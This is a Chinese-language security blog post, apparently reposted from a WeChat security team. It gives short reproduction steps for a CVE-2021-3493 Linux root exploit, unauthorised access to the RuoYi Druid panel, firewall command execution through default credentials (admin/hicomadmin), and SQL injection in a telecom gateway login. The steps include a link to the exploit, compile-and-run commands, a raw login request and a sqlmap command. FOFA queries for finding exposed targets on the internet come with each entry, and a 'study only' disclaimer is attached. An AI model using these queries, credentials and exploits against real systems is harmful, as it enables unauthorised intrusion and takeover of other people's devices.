“ 那些比你走得远的人,并不一定比你聪慧,只是每天多走了一点。世上所谓的“奇迹”,不过是坚持、努力的代名词!”
导读
本文章仅用于交流学习,请勿使用该方法进行违法活动,谢谢!(公众号复现过程略显简单,有需要复现文档的直接去公众号回复“MoBei”
复现索引(不要管标题名字~~)
Linux kernel权限提升漏洞 CVE-2021-3493
1)环境搭建(虚拟机下载地址如下)
http://mirrors.ustc.edu.cn/ubuntu-releases/18.04/ubuntu-18.04.5-desktop-amd64.iso
2)准备工作,将EXP上传到靶机,exp下载地址如下
https://github.com/briskets/CVE-2021-3493
3)执行如下命令,编译脚本并执行~
gcc exploit.c -o exploit
chmod +x exploit
./exploit
4)运行EXP成功提权(直接就ROOT了)
5)环境搭建复现的过程中出现了两个小问题的解决办法分享~
a、安装好ubuntu后,可以直接sudo passwd root修改root密码
b、ssh连接显示SSH服务器拒绝了密码,请再试一次。如果修改配置文件和防火墙添加规则还不行,把用户名大写字母都改为小写的即可。
若依管理系统未授权访问
1)FOFA语句
app="若依-管理系统"
2)登录界面
3)POC
http://xxx.xxx.xxx.xxx/prod-api/druid/index.html
佑友防火墙后台命令执行漏洞
1)FOFA语句
title="佑友防火墙"
2)登录界面
3)默认账户密码(登录截图就省略了,你们懂的~~)
User: admin
Pass: hicomadmin
4)登录后台--系统管理 --维护工具 --Ping命令
5)命令执行
电信网关配置管理系统 前台登陆页面用户名参数存在SQL注入漏洞
1)FOFA语句
body="src="img/dl.gif"" && title="系统登录"
2)登录界面
3)设备默认弱口令
**admin/admin**
4)登录请求包
POST /manager/login.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=2lfi6enp5gehalrb92594c80i6
Connection: close
Name=admin&Pass=admin
5)保存为文件使用 Sqlmap工具,注入点为 **Name参数**
sqlmap -r sql-1.txt -p Name --risk 3
- - - - - - - - - - - - - - - END - - - - - - - - - - ----------
点关注,不迷路
觉得不错的帮忙点个“赞”,“在看” ~~~
原文始发于微信公众号(五六七安全团队):Linux kernel权限提升漏洞 CVE-2021-3493
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论